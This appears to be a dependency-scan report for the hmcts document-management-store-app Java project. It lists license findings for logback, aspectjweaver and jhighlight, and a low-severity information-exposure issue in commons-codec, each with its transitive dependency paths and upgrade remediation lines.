  • Introduced through: hmcts/document-management-store-app@hmcts/document-management-store-app#da54edd067c0cfa566f3b51d8da9523d9df6bd40 org.springframework.boot:spring-boot-starter-actuator@4.0.0-M2 org.springframework.boot:spring-boot-starter@4.0.0-M2 org.springframework.boot:spring-boot-starter-logging@4.0.0-M2 ch.qos.logback:logback-classic@1.5.18
  • Introduced through: hmcts/document-management-store-app@hmcts/document-management-store-app#da54edd067c0cfa566f3b51d8da9523d9df6bd40 org.springframework.boot:spring-boot-starter-aop@4.0.0-M2 org.springframework.boot:spring-boot-starter@4.0.0-M2 org.springframework.boot:spring-boot-starter-logging@4.0.0-M2 ch.qos.logback:logback-classic@1.5.18
  • Introduced through: hmcts/document-management-store-app@hmcts/document-management-store-app#da54edd067c0cfa566f3b51d8da9523d9df6bd40 org.springframework.boot:spring-boot-starter-batch@4.0.0-M2 org.springframework.boot:spring-boot-starter@4.0.0-M2 org.springframework.boot:spring-boot-starter-logging@4.0.0-M2 ch.qos.logback:logback-classic@1.5.18
  • Introduced through: hmcts/document-management-store-app@hmcts/document-management-store-app#da54edd067c0cfa566f3b51d8da9523d9df6bd40 org.springframework.boot:spring-boot-starter-data-jpa@4.0.0-M2 org.springframework.boot:spring-boot-starter@4.0.0-M2 org.springframework.boot:spring-boot-starter-logging@4.0.0-M2 ch.qos.logback:logback-classic@1.5.18
  • Introduced through: hmcts/document-management-store-app@hmcts/document-management-store-app#da54edd067c0cfa566f3b51d8da9523d9df6bd40 org.springframework.boot:spring-boot-starter-data-rest@4.0.0-M2 org.springframework.boot:spring-boot-starter@4.0.0-M2 org.springframework.boot:spring-boot-starter-logging@4.0.0-M2 ch.qos.logback:logback-classic@1.5.18
  • Introduced through: hmcts/document-management-store-app@hmcts/document-management-store-app#da54edd067c0cfa566f3b51d8da9523d9df6bd40 org.springframework.boot:spring-boot-starter-batch@4.0.0-M2 org.springframework.boot:spring-boot-starter-jdbc@4.0.0-M2 org.springframework.boot:spring-boot-starter@4.0.0-M2 org.springframework.boot:spring-boot-starter-logging@4.0.0-M2 ch.qos.logback:logback-classic@1.5.18
  • Introduced through: hmcts/document-management-store-app@hmcts/document-management-store-app#da54edd067c0cfa566f3b51d8da9523d9df6bd40 org.springframework.boot:spring-boot-starter-data-jpa@4.0.0-M2 org.springframework.boot:spring-boot-starter-jdbc@4.0.0-M2 org.springframework.boot:spring-boot-starter@4.0.0-M2 org.springframework.boot:spring-boot-starter-logging@4.0.0-M2 ch.qos.logback:logback-classic@1.5.18
  • Introduced through: hmcts/document-management-store-app@hmcts/document-management-store-app#da54edd067c0cfa566f3b51d8da9523d9df6bd40 org.springframework.boot:spring-boot-starter-data-rest@4.0.0-M2 org.springframework.boot:spring-boot-starter-jackson@4.0.0-M2 org.springframework.boot:spring-boot-starter@4.0.0-M2 org.springframework.boot:spring-boot-starter-logging@4.0.0-M2 ch.qos.logback:logback-classic@1.5.18
  • Introduced through: hmcts/document-management-store-app@hmcts/document-management-store-app#da54edd067c0cfa566f3b51d8da9523d9df6bd40 org.springframework.boot:spring-boot-starter-web@4.0.0-M2 org.springframework.boot:spring-boot-starter-jackson@4.0.0-M2 org.springframework.boot:spring-boot-starter@4.0.0-M2 org.springframework.boot:spring-boot-starter-logging@4.0.0-M2 ch.qos.logback:logback-classic@1.5.18
  • Introduced through: hmcts/document-management-store-app@hmcts/document-management-store-app#da54edd067c0cfa566f3b51d8da9523d9df6bd40 org.springframework.boot:spring-boot-starter-web@4.0.0-M2 org.springframework.boot:spring-boot-starter-tomcat@4.0.0-M2 org.springframework.boot:spring-boot-starter@4.0.0-M2 org.springframework.boot:spring-boot-starter-logging@4.0.0-M2 ch.qos.logback:logback-classic@1.5.18
  • Introduced through: hmcts/document-management-store-app@hmcts/document-management-store-app#da54edd067c0cfa566f3b51d8da9523d9df6bd40 org.springframework.boot:spring-boot-starter-data-rest@4.0.0-M2 org.springframework.boot:spring-boot-starter-webmvc@4.0.0-M2 org.springframework.boot:spring-boot-starter@4.0.0-M2 org.springframework.boot:spring-boot-starter-logging@4.0.0-M2 ch.qos.logback:logback-classic@1.5.18
  • Introduced through: hmcts/document-management-store-app@hmcts/document-management-store-app#da54edd067c0cfa566f3b51d8da9523d9df6bd40 org.springframework.cloud:spring-cloud-starter-bootstrap@4.3.0 org.springframework.cloud:spring-cloud-starter@4.3.0 org.springframework.boot:spring-boot-starter@4.0.0-M2 org.springframework.boot:spring-boot-starter-logging@4.0.0-M2 ch.qos.logback:logback-classic@1.5.18
  • Introduced through: hmcts/document-management-store-app@hmcts/document-management-store-app#da54edd067c0cfa566f3b51d8da9523d9df6bd40 org.springframework.cloud:spring-cloud-starter-openfeign@4.3.0 org.springframework.cloud:spring-cloud-starter@4.3.0 org.springframework.boot:spring-boot-starter@4.0.0-M2 org.springframework.boot:spring-boot-starter-logging@4.0.0-M2 ch.qos.logback:logback-classic@1.5.18
  • Introduced through: hmcts/document-management-store-app@hmcts/document-management-store-app#da54edd067c0cfa566f3b51d8da9523d9df6bd40 org.springframework.boot:spring-boot-starter-data-rest@4.0.0-M2 org.springframework.boot:spring-boot-starter-webmvc@4.0.0-M2 org.springframework.boot:spring-boot-starter-jackson@4.0.0-M2 org.springframework.boot:spring-boot-starter@4.0.0-M2 org.springframework.boot:spring-boot-starter-logging@4.0.0-M2 ch.qos.logback:logback-classic@1.5.18
  • Introduced through: hmcts/document-management-store-app@hmcts/document-management-store-app#da54edd067c0cfa566f3b51d8da9523d9df6bd40 org.springframework.boot:spring-boot-starter-data-rest@4.0.0-M2 org.springframework.boot:spring-boot-starter-webmvc@4.0.0-M2 org.springframework.boot:spring-boot-starter-tomcat@4.0.0-M2 org.springframework.boot:spring-boot-starter@4.0.0-M2 org.springframework.boot:spring-boot-starter-logging@4.0.0-M2 ch.qos.logback:logback-classic@1.5.18
  • Introduced through: hmcts/document-management-store-app@hmcts/document-management-store-app#da54edd067c0cfa566f3b51d8da9523d9df6bd40 org.springdoc:springdoc-openapi-starter-webmvc-ui@2.8.12 org.springdoc:springdoc-openapi-starter-webmvc-api@2.8.12 org.springdoc:springdoc-openapi-starter-common@2.8.12 org.springframework.boot:spring-boot-starter-validation@4.0.0-M2 org.springframework.boot:spring-boot-starter@4.0.0-M2 org.springframework.boot:spring-boot-starter-logging@4.0.0-M2 ch.qos.logback:logback-classic@1.5.18

Dual license: EPL-1.0, LGPL-2.1

medium severity

Dual license: EPL-1.0, LGPL-2.1

  • Module: ch.qos.logback:logback-core
  • Introduced through: org.springframework.boot:spring-boot-starter-validation@4.0.0-M2, org.springframework.boot:spring-boot-starter-actuator@4.0.0-M2 and others

Detailed paths

  • Introduced through: hmcts/document-management-store-app@hmcts/document-management-store-app#da54edd067c0cfa566f3b51d8da9523d9df6bd40 org.springframework.boot:spring-boot-starter-validation@4.0.0-M2 org.springframework.boot:spring-boot-starter@4.0.0-M2 org.springframework.boot:spring-boot-starter-logging@4.0.0-M2 ch.qos.logback:logback-classic@1.5.18 ch.qos.logback:logback-core@1.5.18
  • Introduced through: hmcts/document-management-store-app@hmcts/document-management-store-app#da54edd067c0cfa566f3b51d8da9523d9df6bd40 org.springframework.boot:spring-boot-starter-actuator@4.0.0-M2 org.springframework.boot:spring-boot-starter@4.0.0-M2 org.springframework.boot:spring-boot-starter-logging@4.0.0-M2 ch.qos.logback:logback-classic@1.5.18 ch.qos.logback:logback-core@1.5.18
  • Introduced through: hmcts/document-management-store-app@hmcts/document-management-store-app#da54edd067c0cfa566f3b51d8da9523d9df6bd40 org.springframework.boot:spring-boot-starter-aop@4.0.0-M2 org.springframework.boot:spring-boot-starter@4.0.0-M2 org.springframework.boot:spring-boot-starter-logging@4.0.0-M2 ch.qos.logback:logback-classic@1.5.18 ch.qos.logback:logback-core@1.5.18
  • Introduced through: hmcts/document-management-store-app@hmcts/document-management-store-app#da54edd067c0cfa566f3b51d8da9523d9df6bd40 org.springframework.boot:spring-boot-starter-batch@4.0.0-M2 org.springframework.boot:spring-boot-starter@4.0.0-M2 org.springframework.boot:spring-boot-starter-logging@4.0.0-M2 ch.qos.logback:logback-classic@1.5.18 ch.qos.logback:logback-core@1.5.18
  • Introduced through: hmcts/document-management-store-app@hmcts/document-management-store-app#da54edd067c0cfa566f3b51d8da9523d9df6bd40 org.springframework.boot:spring-boot-starter-data-jpa@4.0.0-M2 org.springframework.boot:spring-boot-starter@4.0.0-M2 org.springframework.boot:spring-boot-starter-logging@4.0.0-M2 ch.qos.logback:logback-classic@1.5.18 ch.qos.logback:logback-core@1.5.18
  • Introduced through: hmcts/document-management-store-app@hmcts/document-management-store-app#da54edd067c0cfa566f3b51d8da9523d9df6bd40 org.springframework.boot:spring-boot-starter-data-rest@4.0.0-M2 org.springframework.boot:spring-boot-starter@4.0.0-M2 org.springframework.boot:spring-boot-starter-logging@4.0.0-M2 ch.qos.logback:logback-classic@1.5.18 ch.qos.logback:logback-core@1.5.18
  • Introduced through: hmcts/document-management-store-app@hmcts/document-management-store-app#da54edd067c0cfa566f3b51d8da9523d9df6bd40 org.springframework.boot:spring-boot-starter-batch@4.0.0-M2 org.springframework.boot:spring-boot-starter-jdbc@4.0.0-M2 org.springframework.boot:spring-boot-starter@4.0.0-M2 org.springframework.boot:spring-boot-starter-logging@4.0.0-M2 ch.qos.logback:logback-classic@1.5.18 ch.qos.logback:logback-core@1.5.18
  • Introduced through: hmcts/document-management-store-app@hmcts/document-management-store-app#da54edd067c0cfa566f3b51d8da9523d9df6bd40 org.springframework.boot:spring-boot-starter-data-jpa@4.0.0-M2 org.springframework.boot:spring-boot-starter-jdbc@4.0.0-M2 org.springframework.boot:spring-boot-starter@4.0.0-M2 org.springframework.boot:spring-boot-starter-logging@4.0.0-M2 ch.qos.logback:logback-classic@1.5.18 ch.qos.logback:logback-core@1.5.18
  • Introduced through: hmcts/document-management-store-app@hmcts/document-management-store-app#da54edd067c0cfa566f3b51d8da9523d9df6bd40 org.springframework.boot:spring-boot-starter-data-rest@4.0.0-M2 org.springframework.boot:spring-boot-starter-jackson@4.0.0-M2 org.springframework.boot:spring-boot-starter@4.0.0-M2 org.springframework.boot:spring-boot-starter-logging@4.0.0-M2 ch.qos.logback:logback-classic@1.5.18 ch.qos.logback:logback-core@1.5.18
  • Introduced through: hmcts/document-management-store-app@hmcts/document-management-store-app#da54edd067c0cfa566f3b51d8da9523d9df6bd40 org.springframework.boot:spring-boot-starter-web@4.0.0-M2 org.springframework.boot:spring-boot-starter-jackson@4.0.0-M2 org.springframework.boot:spring-boot-starter@4.0.0-M2 org.springframework.boot:spring-boot-starter-logging@4.0.0-M2 ch.qos.logback:logback-classic@1.5.18 ch.qos.logback:logback-core@1.5.18
  • Introduced through: hmcts/document-management-store-app@hmcts/document-management-store-app#da54edd067c0cfa566f3b51d8da9523d9df6bd40 org.springframework.boot:spring-boot-starter-web@4.0.0-M2 org.springframework.boot:spring-boot-starter-tomcat@4.0.0-M2 org.springframework.boot:spring-boot-starter@4.0.0-M2 org.springframework.boot:spring-boot-starter-logging@4.0.0-M2 ch.qos.logback:logback-classic@1.5.18 ch.qos.logback:logback-core@1.5.18
  • Introduced through: hmcts/document-management-store-app@hmcts/document-management-store-app#da54edd067c0cfa566f3b51d8da9523d9df6bd40 org.springframework.boot:spring-boot-starter-data-rest@4.0.0-M2 org.springframework.boot:spring-boot-starter-webmvc@4.0.0-M2 org.springframework.boot:spring-boot-starter@4.0.0-M2 org.springframework.boot:spring-boot-starter-logging@4.0.0-M2 ch.qos.logback:logback-classic@1.5.18 ch.qos.logback:logback-core@1.5.18
  • Introduced through: hmcts/document-management-store-app@hmcts/document-management-store-app#da54edd067c0cfa566f3b51d8da9523d9df6bd40 org.springframework.cloud:spring-cloud-starter-bootstrap@4.3.0 org.springframework.cloud:spring-cloud-starter@4.3.0 org.springframework.boot:spring-boot-starter@4.0.0-M2 org.springframework.boot:spring-boot-starter-logging@4.0.0-M2 ch.qos.logback:logback-classic@1.5.18 ch.qos.logback:logback-core@1.5.18
  • Introduced through: hmcts/document-management-store-app@hmcts/document-management-store-app#da54edd067c0cfa566f3b51d8da9523d9df6bd40 org.springframework.cloud:spring-cloud-starter-openfeign@4.3.0 org.springframework.cloud:spring-cloud-starter@4.3.0 org.springframework.boot:spring-boot-starter@4.0.0-M2 org.springframework.boot:spring-boot-starter-logging@4.0.0-M2 ch.qos.logback:logback-classic@1.5.18 ch.qos.logback:logback-core@1.5.18
  • Introduced through: hmcts/document-management-store-app@hmcts/document-management-store-app#da54edd067c0cfa566f3b51d8da9523d9df6bd40 org.springframework.boot:spring-boot-starter-data-rest@4.0.0-M2 org.springframework.boot:spring-boot-starter-webmvc@4.0.0-M2 org.springframework.boot:spring-boot-starter-jackson@4.0.0-M2 org.springframework.boot:spring-boot-starter@4.0.0-M2 org.springframework.boot:spring-boot-starter-logging@4.0.0-M2 ch.qos.logback:logback-classic@1.5.18 ch.qos.logback:logback-core@1.5.18
  • Introduced through: hmcts/document-management-store-app@hmcts/document-management-store-app#da54edd067c0cfa566f3b51d8da9523d9df6bd40 org.springframework.boot:spring-boot-starter-data-rest@4.0.0-M2 org.springframework.boot:spring-boot-starter-webmvc@4.0.0-M2 org.springframework.boot:spring-boot-starter-tomcat@4.0.0-M2 org.springframework.boot:spring-boot-starter@4.0.0-M2 org.springframework.boot:spring-boot-starter-logging@4.0.0-M2 ch.qos.logback:logback-classic@1.5.18 ch.qos.logback:logback-core@1.5.18
  • Introduced through: hmcts/document-management-store-app@hmcts/document-management-store-app#da54edd067c0cfa566f3b51d8da9523d9df6bd40 org.springdoc:springdoc-openapi-starter-webmvc-ui@2.8.12 org.springdoc:springdoc-openapi-starter-webmvc-api@2.8.12 org.springdoc:springdoc-openapi-starter-common@2.8.12 org.springframework.boot:spring-boot-starter-validation@4.0.0-M2 org.springframework.boot:spring-boot-starter@4.0.0-M2 org.springframework.boot:spring-boot-starter-logging@4.0.0-M2 ch.qos.logback:logback-classic@1.5.18 ch.qos.logback:logback-core@1.5.18

Dual license: EPL-1.0, LGPL-2.1

medium severity

EPL-1.0 license

  • Module: org.aspectj:aspectjweaver
  • Introduced through: org.springframework.boot:spring-boot-starter-aop@4.0.0-M2 and org.springframework.boot:spring-boot-starter-data-jpa@4.0.0-M2

Detailed paths

  • Introduced through: hmcts/document-management-store-app@hmcts/document-management-store-app#da54edd067c0cfa566f3b51d8da9523d9df6bd40 org.springframework.boot:spring-boot-starter-aop@4.0.0-M2 org.aspectj:aspectjweaver@1.9.24
  • Introduced through: hmcts/document-management-store-app@hmcts/document-management-store-app#da54edd067c0cfa566f3b51d8da9523d9df6bd40 org.springframework.boot:spring-boot-starter-data-jpa@4.0.0-M2 org.springframework.boot:spring-boot-data-jpa@4.0.0-M2 org.springframework:spring-aspects@7.0.0-M8 org.aspectj:aspectjweaver@1.9.24

EPL-1.0 license

medium severity

Dual license: CDDL-1.0, LGPL-2.1

  • Module: org.codelibs:jhighlight
  • Introduced through: org.apache.tika:tika-parsers-standard-package@3.2.2

Detailed paths

  • Introduced through: hmcts/document-management-store-app@hmcts/document-management-store-app#da54edd067c0cfa566f3b51d8da9523d9df6bd40 org.apache.tika:tika-parsers-standard-package@3.2.2 org.apache.tika:tika-parser-code-module@3.2.2 org.codelibs:jhighlight@1.1.0

Dual license: CDDL-1.0, LGPL-2.1

low severity

Information Exposure

  • Vulnerable module: commons-codec:commons-codec
  • Introduced through: org.apache.httpcomponents:httpclient@4.5.14 and org.apache.tika:tika-parsers-standard-package@3.2.2

Detailed paths

  • Introduced through: hmcts/document-management-store-app@hmcts/document-management-store-app#da54edd067c0cfa566f3b51d8da9523d9df6bd40 org.apache.httpcomponents:httpclient@4.5.14 commons-codec:commons-codec@1.11
  • Introduced through: hmcts/document-management-store-app@hmcts/document-management-store-app#da54edd067c0cfa566f3b51d8da9523d9df6bd40 org.apache.tika:tika-parsers-standard-package@3.2.2 org.apache.tika:tika-parser-html-module@3.2.2 commons-codec:commons-codec@1.11
    Remediation: Upgrade to org.apache.tika:tika-parsers-standard-package@3.2.2.
  • Introduced through: hmcts/document-management-store-app@hmcts/document-management-store-app#da54edd067c0cfa566f3b51d8da9523d9df6bd40 org.apache.tika:tika-parsers-standard-package@3.2.2 org.apache.tika:tika-parser-text-module@3.2.2 commons-codec:commons-codec@1.11
    Remediation: Upgrade to org.apache.tika:tika-parsers-standard-package@3.2.2.
  • Introduced through: hmcts/document-management-store-app@hmcts/document-management-store-app#da54edd067c0cfa566f3b51d8da9523d9df6bd40 org.apache.tika:tika-parsers-standard-package@3.2.2 org.apache.tika:tika-parser-xml-module@3.2.2 commons-codec:commons-codec@1.11
    Remediation: Upgrade to org.apache.tika:tika-parsers-standard-package@3.2.2.
  • Introduced through: hmcts/document-management-store-app@hmcts/document-management-store-app#da54edd067c0cfa566f3b51d8da9523d9df6bd40 org.apache.tika:tika-parsers-standard-package@3.2.2 org.apache.tika:tika-parser-microsoft-module@3.2.2 commons-codec:commons-codec@1.11
    Remediation: Upgrade to org.apache.tika:tika-parsers-standard-package@3.2.2.
  • Introduced through: hmcts/document-management-store-app@hmcts/document-management-store-app#da54edd067c0cfa566f3b51d8da9523d9df6bd40 org.apache.tika:tika-parsers-standard-package@3.2.2 org.apache.tika:tika-parser-digest-commons@3.2.2 commons-codec:commons-codec@1.11
    Remediation: Upgrade to org.apache.tika:tika-parsers-standard-package@3.2.2.
  • Introduced through: hmcts/document-management-store-app@hmcts/document-management-store-app#da54edd067c0cfa566f3b51d8da9523d9df6bd40 org.apache.tika:tika-parsers-standard-package@3.2.2 org.apache.tika:tika-parser-miscoffice-module@3.2.2 commons-codec:commons-codec@1.11
    Remediation: Upgrade to org.apache.tika:tika-parsers-standard-package@3.2.2.
  • Introduced through: hmcts/document-management-store-app@hmcts/document-management-store-app#da54edd067c0cfa566f3b51d8da9523d9df6bd40 org.apache.tika:tika-parsers-standard-package@3.2.2 org.apache.tika:tika-parser-webarchive-module@3.2.2 org.apache.commons:commons-compress@1.28.0 commons-codec:commons-codec@1.11
    Remediation: Upgrade to org.apache.tika:tika-parsers-standard-package@3.2.2.
  • Introduced through: hmcts/document-management-store-app@hmcts/document-management-store-app#da54edd067c0cfa566f3b51d8da9523d9df6bd40 org.apache.tika:tika-parsers-standard-package@3.2.2 org.apache.tika:tika-parser-miscoffice-module@3.2.2 org.apache.poi:poi@5.4.1 commons-codec:commons-codec@1.11
    Remediation: Upgrade to org.apache.tika:tika-parsers-standard-package@3.2.2.
  • Introduced through: hmcts/document-management-store-app@hmcts/document-management-store-app#da54edd067c0cfa566f3b51d8da9523d9df6bd40 org.apache.tika:tika-parsers-standard-package@3.2.2 org.apache.tika:tika-parser-microsoft-module@3.2.2 org.apache.poi:poi@5.4.1 commons-codec:commons-codec@1.11
    Remediation: Upgrade to org.apache.tika:tika-parsers-standard-package@3.2.2.
  • Introduced through: hmcts/document-management-store-app@hmcts/document-management-store-app#da54edd067c0cfa566f3b51d8da9523d9df6bd40 org.apache.tika:tika-parsers-standard-package@3.2.2 org.apache.tika:tika-parser-microsoft-module@3.2.2 org.apache.poi:poi-scratchpad@5.4.1 commons-codec:commons-codec@1.11
    Remediation: Upgrade to org.apache.tika:tika-parsers-standard-package@3.2.2.
  • Introduced through: hmcts/document-management-store-app@hmcts/document-management-store-app#da54edd067c0cfa566f3b51d8da9523d9df6bd40 org.apache.tika:tika-parsers-standard-package@3.2.2 org.apache.tika:tika-parser-microsoft-module@3.2.2 org.apache.tika:tika-parser-html-module@3.2.2 commons-codec:commons-codec@1.11
    Remediation: Upgrade to org.apache.tika:tika-parsers-standard-package@3.2.2.
  • Introduced through: hmcts/document-management-store-app@hmcts/document-management-store-app#da54edd067c0cfa566f3b51d8da9523d9df6bd40 org.apache.tika:tika-parsers-standard-package@3.2.2 org.apache.tika:tika-parser-mail-module@3.2.2 org.apache.tika:tika-parser-html-module@3.2.2 commons-codec:commons-codec@1.11
    Remediation: Upgrade to org.apache.tika:tika-parsers-standard-package@3.2.2.
  • Introduced through: hmcts/document-management-store-app@hmcts/document-management-store-app#da54edd067c0cfa566f3b51d8da9523d9df6bd40 org.apache.tika:tika-parsers-standard-package@3.2.2 org.apache.tika:tika-parser-text-module@3.2.2 org.apache.commons:commons-csv@1.14.1 commons-codec:commons-codec@1.11
    Remediation: Upgrade to org.apache.tika:tika-parsers-standard-package@3.2.2.
  • Introduced through: hmcts/document-management-store-app@hmcts/document-management-store-app#da54edd067c0cfa566f3b51d8da9523d9df6bd40 org.apache.tika:tika-parsers-standard-package@3.2.2 org.apache.tika:tika-parser-microsoft-module@3.2.2 org.apache.tika:tika-parser-text-module@3.2.2 commons-codec:commons-codec@1.11
    Remediation: Upgrade to org.apache.tika:tika-parsers-standard-package@3.2.2.
  • Introduced through: hmcts/document-management-store-app@hmcts/document-management-store-app#da54edd067c0cfa566f3b51d8da9523d9df6bd40 org.apache.tika:tika-parsers-standard-package@3.2.2 org.apache.tika:tika-parser-code-module@3.2.2 org.apache.tika:tika-parser-text-module@3.2.2 commons-codec:commons-codec@1.11
    Remediation: Upgrade to org.apache.tika:tika-parsers-standard-package@3.2.2.
  • Introduced through: hmcts/document-management-store-app@hmcts/document-management-store-app#da54edd067c0cfa566f3b51d8da9523d9df6bd40 org.apache.tika:tika-parsers-standard-package@3.2.2 org.apache.tika:tika-parser-mail-module@3.2.2 org.apache.tika:tika-parser-text-module@3.2.2 commons-codec:commons-codec@1.11
    Remediation: Upgrade to org.apache.tika:tika-parsers-standard-package@3.2.2.
  • Introduced through: hmcts/document-management-store-app@hmcts/document-management-store-app#da54edd067c0cfa566f3b51d8da9523d9df6bd40 org.apache.tika:tika-parsers-standard-package@3.2.2 org.apache.tika:tika-parser-miscoffice-module@3.2.2 org.apache.tika:tika-parser-text-module@3.2.2 commons-codec:commons-codec@1.11
    Remediation: Upgrade to org.apache.tika:tika-parsers-standard-package@3.2.2.
  • Introduced through: hmcts/document-management-store-app@hmcts/document-management-store-app#da54edd067c0cfa566f3b51d8da9523d9df6bd40 org.apache.tika:tika-parsers-standard-package@3.2.2 org.apache.tika:tika-parser-microsoft-module@3.2.2 org.apache.tika:tika-parser-xml-module@3.2.2 commons-codec:commons-codec@1.11
    Remediation: Upgrade to org.apache.tika:tika-parsers-standard-package@3.2.2.
  • Introduced through: hmcts/document-management-store-app@hmcts/document-management-store-app#da54edd067c0cfa566f3b51d8da9523d9df6bd40 org.apache.tika:tika-parsers-standard-package@3.2.2 org.apache.tika:tika-parser-miscoffice-module@3.2.2 org.apache.tika:tika-parser-xml-module@3.2.2 commons-codec:commons-codec@1.11
    Remediation: Upgrade to org.apache.tika:tika-parsers-standard-package@3.2.2.
  • Introduced through: hmcts/document-management-store-app@hmcts/document-management-store-app#da54edd067c0cfa566f3b51d8da9523d9df6bd40 org.apache.tika:tika-parsers-standard-package@3.2.2 org.apache.tika:tika-parser-cad-module@3.2.2 org.apache.tika:tika-parser-microsoft-module@3.2.2 commons-codec:commons-codec@1.11
    Remediation: Upgrade to org.apache.tika:tika-parsers-standard-package@3.2.2.
  • Introduced through: hmcts/document-management-store-app@hmcts/document-management-store-app#da54edd067c0cfa566f3b51d8da9523d9df6bd40 org.apache.tika:tika-parsers-standard-package@3.2.2 org.apache.tika:tika-parser-apple-module@3.2.2 org.apache.tika:tika-parser-zip-commons@3.2.2 org.apache.commons:commons-compress@1.28.0 commons-codec:commons-codec@1.11
    Remediation: Upgrade to org.apache.tika:tika-parsers-standard-package@3.2.2.
  • Introduced through: hmcts/document-management-store-app@hmcts/document-management-store-app#da54edd067c0cfa566f3b51d8da9523d9df6bd40 org.apache.tika:tika-parsers-standard-package@3.2.2 org.apache.tika:tika-parser-microsoft-module@3.2.2 org.apache.tika:tika-parser-zip-commons@3.2.2 org.apache.commons:commons-compress@1.28.0 commons-codec:commons-codec@1.11
    Remediation: Upgrade to org.apache.tika:tika-parsers-standard-package@3.2.2.
  • Introduced through: hmcts/document-management-store-app@hmcts/document-management-store-app#da54edd067c0cfa566f3b51d8da9523d9df6bd40 org.apache.tika:tika-parsers-standard-package@3.2.2 org.apache.tika:tika-parser-miscoffice-module@3.2.2 org.apache.tika:tika-parser-zip-commons@3.2.2 org.apache.commons:commons-compress@1.28.0 commons-codec:commons-codec@1.11
    Remediation: Upgrade to org.apache.tika:tika-parsers-standard-package@3.2.2.
  • Introduced through: hmcts/document-management-store-app@hmcts/document-management-store-app#da54edd067c0cfa566f3b51d8da9523d9df6bd40 org.apache.tika:tika-parsers-standard-package@3.2.2 org.apache.tika:tika-parser-pkg-module@3.2.2 org.apache.tika:tika-parser-zip-commons@3.2.2 org.apache.commons:commons-compress@1.28.0 commons-codec:commons-codec@1.11
    Remediation: Upgrade to org.apache.tika:tika-parsers-standard-package@3.2.2.
  • Introduced through: hmcts/document-management-store-app@hmcts/document-management-store-app#da54edd067c0cfa566f3b51d8da9523d9df6bd40 org.apache.tika:tika-parsers-standard-package@3.2.2 org.apache.tika:tika-parser-microsoft-module@3.2.2 org.apache.poi:poi-ooxml@5.4.1 org.apache.commons:commons-compress@1.28.0 commons-codec:commons-codec@1.11
  • Introduced through: hmcts/document-management-store-app@hmcts/document-management-store-app#da54edd067c0cfa566f3b51d8da9523d9df6bd40 org.apache.tika:tika-parsers-standard-package@3.2.2 org.apache.tika:tika-parser-microsoft-module@3.2.2 org.apache.poi:poi-ooxml@5.4.1 org.apache.poi:poi@5.4.1 commons-codec:commons-codec@1.11
    Remediation: Upgrade to org.apache.tika:tika-parsers-standard-package@3.2.2.
  • Introduced through: hmcts/document-management-store-app@hmcts/document-management-store-app#da54edd067c0cfa566f3b51d8da9523d9df6bd40 org.apache.tika:tika-parsers-standard-package@3.2.2 org.apache.tika:tika-parser-microsoft-module@3.2.2 org.apache.poi:poi-scratchpad@5.4.1 org.apache.poi:poi@5.4.1 commons-codec:commons-codec@1.11
    Remediation: Upgrade to org.apache.tika:tika-parsers-standard-package@3.2.2.
  • Introduced through: hmcts/document-management-store-app@hmcts/document-management-store-app#da54edd067c0cfa566f3b51d8da9523d9df6bd40 org.apache.tika:tika-parsers-standard-package@3.2.2 org.apache.tika:tika-parser-cad-module@3.2.2 org.apache.tika:tika-parser-microsoft-module@3.2.2 org.apache.poi:poi@5.4.1 commons-codec:commons-codec@1.11
    Remediation: Upgrade to org.apache.tika:tika-parsers-standard-package@3.2.2.
  • Introduced through: hmcts/document-management-store-app@hmcts/document-management-store-app#da54edd067c0cfa566f3b51d8da9523d9df6bd40 org.apache.tika:tika-parsers-standard-package@3.2.2 org.apache.tika:tika-parser-cad-module@3.2.2 org.apache.tika:tika-parser-microsoft-module@3.2.2 org.apache.poi:poi-scratchpad@5.4.1 commons-codec:commons-codec@1.11
    Remediation: Upgrade to org.apache.tika:tika-parsers-standard-package@3.2.2.
  • Introduced through: hmcts/document-management-store-app@hmcts/document-management-store-app#da54edd067c0cfa566f3b51d8da9523d9df6bd40 org.apache.tika:tika-parsers-standard-package@3.2.2 org.apache.tika:tika-parser-cad-module@3.2.2 org.apache.tika:tika-parser-microsoft-module@3.2.2 org.apache.tika:tika-parser-html-module@3.2.2 commons-codec:commons-codec@1.11
    Remediation: Upgrade to org.apache.tika:tika-parsers-standard-package@3.2.2.
  • Introduced through: hmcts/document-management-store-app@hmcts/document-management-store-app#da54edd067c0cfa566f3b51d8da9523d9df6bd40 org.apache.tika:tika-parsers-standard-package@3.2.2 org.apache.tika:tika-parser-microsoft-module@3.2.2 org.apache.tika:tika-parser-text-module@3.2.2 org.apache.commons:commons-csv@1.14.1 commons-codec:commons-codec@1.11
    Remediation: Upgrade to org.apache.tika:tika-parsers-standard-package@3.2.2.
  • Introduced through: hmcts/document-management-store-app@hmcts/document-management-store-app#da54edd067c0cfa566f3b51d8da9523d9df6bd40 org.apache.tika:tika-parsers-standard-package@3.2.2 org.apache.tika:tika-parser-code-module@3.2.2 org.apache.tika:tika-parser-text-module@3.2.2 org.apache.commons:commons-csv@1.14.1 commons-codec:commons-codec@1.11
    Remediation: Upgrade to org.apache.tika:tika-parsers-standard-package@3.2.2.
  • Introduced through: hmcts/document-management-store-app@hmcts/document-management-store-app#da54edd067c0cfa566f3b51d8da9523d9df6bd40 org.apache.tika:tika-parsers-standard-package@3.2.2 org.apache.tika:tika-parser-mail-module@3.2.2 org.apache.tika:tika-parser-text-module@3.2.2 org.apache.commons:commons-csv@1.14.1 commons-codec:commons-codec@1.11
    Remediation: Upgrade to org.apache.tika:tika-parsers-standard-package@3.2.2.
  • Introduced through: hmcts/document-management-store-app@hmcts/document-management-store-app#da54edd067c0cfa566f3b51d8da9523d9df6bd40 org.apache.tika:tika-parsers-standard-package@3.2.2 org.apache.tika:tika-parser-miscoffice-module@3.2.2 org.apache.tika:tika-parser-text-module@3.2.2 org.apache.commons:commons-csv@1.14.1 commons-codec:commons-codec@1.11
    Remediation: Upgrade to org.apache.tika:tika-parsers-standard-package@3.2.2.
  • Introduced through: hmcts/document-management-store-app@hmcts/document-management-store-app#da54edd067c0cfa566f3b51d8da9523d9df6bd40 org.apache.tika:tika-parsers-standard-package@3.2.2 org.apache.tika:tika-parser-cad-module@3.2.2 org.apache.tika:tika-parser-microsoft-module@3.2.2 org.apache.tika:tika-parser-text-module@3.2.2 commons-codec:commons-codec@1.11
    Remediation: Upgrade to org.apache.tika:tika-parsers-standard-package@3.2.2.
  • Introduced through: hmcts/document-management-store-app@hmcts/document-management-store-app#da54edd067c0cfa566f3b51d8da9523d9df6bd40 org.apache.tika:tika-parsers-standard-package@3.2.2 org.apache.tika:tika-parser-cad-module@3.2.2 org.apache.tika:tika-parser-microsoft-module@3.2.2 org.apache.tika:tika-parser-xml-module@3.2.2 commons-codec:commons-codec@1.11
